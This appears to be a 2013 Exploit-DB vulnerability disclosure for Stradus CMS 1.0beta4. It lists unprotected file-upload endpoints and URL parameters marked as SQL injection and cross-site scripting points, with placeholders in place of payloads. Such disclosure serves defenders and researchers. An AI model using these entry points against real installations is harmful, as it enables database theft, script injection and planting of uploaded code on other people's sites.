Stradus CMS 1.0beta4 - Multiple Vulnerabilities
Author: DaOne
type: webapps
platform: php
port:
date_added: 2013-03-22
date_updated: 2013-03-24
verified: 1
codes: OSVDB-91947;OSVDB-91946;OSVDB-91945;OSVDB-91944;OSVDB-91943;OSVDB-91942
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt25000/scms.png
application_url: http://www.exploit-db.comSCMS.png
##########################################
[~] Exploit Title: Stradus CMS Multiple Vulnerabilities
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://stradus.eu/
[~] Software Link: http://sourceforge.net/projects/straduscms/
[~] Category: webapps/php
[~] Version: 1.0beta4
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################
# File Upload
http://localhost/SCMS_1.0/moduls/photo_album/upload.php
http://localhost/SCMS_1.0/moduls/simply_image/upload.php

# XSS / SQL Injection
http://localhost/SCMS_1.0/adminfiles/log_view.php?order_by={SQLi/XSS}
http://localhost/SCMS_1.0/moduls/photo_album/new.php?edit={SQLi/XSS}